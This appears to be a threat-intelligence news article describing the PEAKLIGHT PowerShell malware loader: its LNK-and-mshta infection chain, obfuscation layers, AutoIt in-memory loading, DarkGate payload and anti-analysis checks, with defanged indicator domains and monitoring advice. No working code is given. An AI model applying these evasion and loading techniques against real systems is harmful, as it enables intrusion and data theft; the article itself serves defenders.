Security researchers at TRAC Labs have uncovered a new PowerShell-based malware loader, PEAKLIGHT, designed to propagate information stealers through a “malware-as-a-service” model.
According to experts, the initial infection vector involves Windows shortcut (LNK) files, which connect to a content delivery network (CDN) to download a JavaScript-based dropper. This dropper executes a PowerShell script that subsequently loads the malicious payload. Among the documented malware distributed via PEAKLIGHT are LummaC2, HijackLoader, and CryptBot.
Also referred to as Emmental Loader, PEAKLIGHT’s malicious LNK files leverage PowerShell in conjunction with mshta.exe to download and execute payloads. For example, a file named Instruction_1928_W9COI.pdf.lnk includes arguments that prompt mshta.exe to fetch a remote JSON file. This file, in turn, retrieves an executable named dxdiag.exe, which contains an encrypted JavaScript payload.
A defining feature of PEAKLIGHT is its extensive use of multilayered obfuscation. Its code employs numeric arrays converted into strings via the String.fromCharCode function and AES encryption. The encrypted payload is decrypted and executed in memory using the CreateDecryptor method from the .NET library. Obfuscated data is ultimately transformed into PowerShell commands executed through base64 encoding.
The AutoIt loader embedded within PEAKLIGHT adds another layer of concealment. By utilizing DLL functions like VirtualProtect, the script decodes the encrypted payload and executes it directly from memory, thereby evading detection by traditional antivirus solutions.
PEAKLIGHT’s final payload, known as DarkGate, encompasses tools for process injection, obfuscation, and espionage activities. For instance, it employs the Process Hollowing technique to stealthily inject malicious code into legitimate Windows processes.
The analysis revealed a suite of defensive mechanisms, including environmental checks for virtualization and sufficient free memory. Payloads are downloaded from domains designed to mimic legitimate services, such as docu-sign[.]info.
To ensure robust protection, TRAC Labs advises security professionals to monitor the following activities:
- Connections to suspicious URLs (e.g.,
docu-sign[.]infoandtimeless-tales[.]shop); - Execution of PowerShell scripts with base64 encoding;
- File activity in TEMP directories;
- Execution of AutoIt scripts.
PEAKLIGHT’s sophisticated obfuscation techniques and multi-tiered loader design render it one of the most formidable threats to modern systems. TRAC Labs will continue to monitor this campaign, providing timely identification of new tactics, techniques, and procedures (TTPs) and equipping defenders with essential protective measures.
